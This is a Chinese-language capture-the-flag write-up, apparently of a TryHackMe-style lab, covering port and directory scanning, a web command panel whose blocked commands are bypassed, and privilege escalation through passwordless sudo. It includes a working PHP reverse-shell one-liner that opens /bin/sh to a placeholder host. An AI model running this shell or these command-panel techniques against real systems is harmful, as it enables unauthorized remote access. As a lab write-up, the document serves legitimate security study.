前言(每日一遍):
“初闻不明劝离意,回头已是提桶人”
(本贴为自学记录贴)
一、信息收集
首先拿到ip:10.10.113.241,对ip进行扫描,这里使用nmap先进行端口扫描
发现开放80端口和22端口,推测是让我们通过网页能拿到账号密码或者密钥远程ssh登录,接下来扫描一下80端口的网页目录
发现一个似乎有用文件robots.txt以及一个目录assets,我们进行查看
没有什么东西,接着查看assets
似乎没有有价值的东西,返回主页查看源代码,发现了账号R1ckRul3s
换个字典用gobuster重新跑一下,这次加上后缀名
前往这几个网页看看有什么收获,首先去login界面发现登录窗口,且无验证码,结合刚才发现的账号尝试爆破密码
爆破无果,最后将之前在robots.txt发现的无用文本用来当密码,发现登录成功(汗...
发现除了commands之外其他页面无法打开,推测为权限太低,尝试commands页面输入ls命令 看能否找到有用的东西
发现有用的文件,尝试用cat打开,发现打不开,命令无法使用这时查看一下还有什么命令能使用,这里先试用which ls 查看我们的ls命令所在的位置,发现为/bin/ls ,下一步我们使用cd /bin && ls 结合命令查看/bin下有哪些还能使用的命令
最后发现less、more、nano命令,尝试用less命令查看txt文本
叫我们在其他文件系统查找,我们直接使用find / -type f -name "*ngred*" 全局查找
在第一个文本中我们得到第一个线索,也是第一个flag
第二个flag在/home/rick这里,这里我们先看一下这是个什么文件
我尝试将其改为一个新的txt文本,然后打开
成功拿到第二个线索,也获得了flag
由于我们打不开其它页面,且没有其他线索,但是可以执行命令行,因此我上传一个php反弹shell,看看有没有作用
php -r '$sock=fsockopen("yourip",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
成功收到反弹shell
二、提权
发现还是没有内容,这时只有考虑提权进入root文件夹看看有没有线索,提权操作有两种思路,第一个是使用sudo+命令,可以达到root用户的权限,第二个是自身变成root用户,这里先尝试下是否可以用sudo命令以及可以使用sudo命令的范围,可通过sudo -l查看。发现靶机无需密码可用sudo进行所有操作,因此直接sudo su变成root用户
变成root后进入root文件夹找到线索3,最后一个flag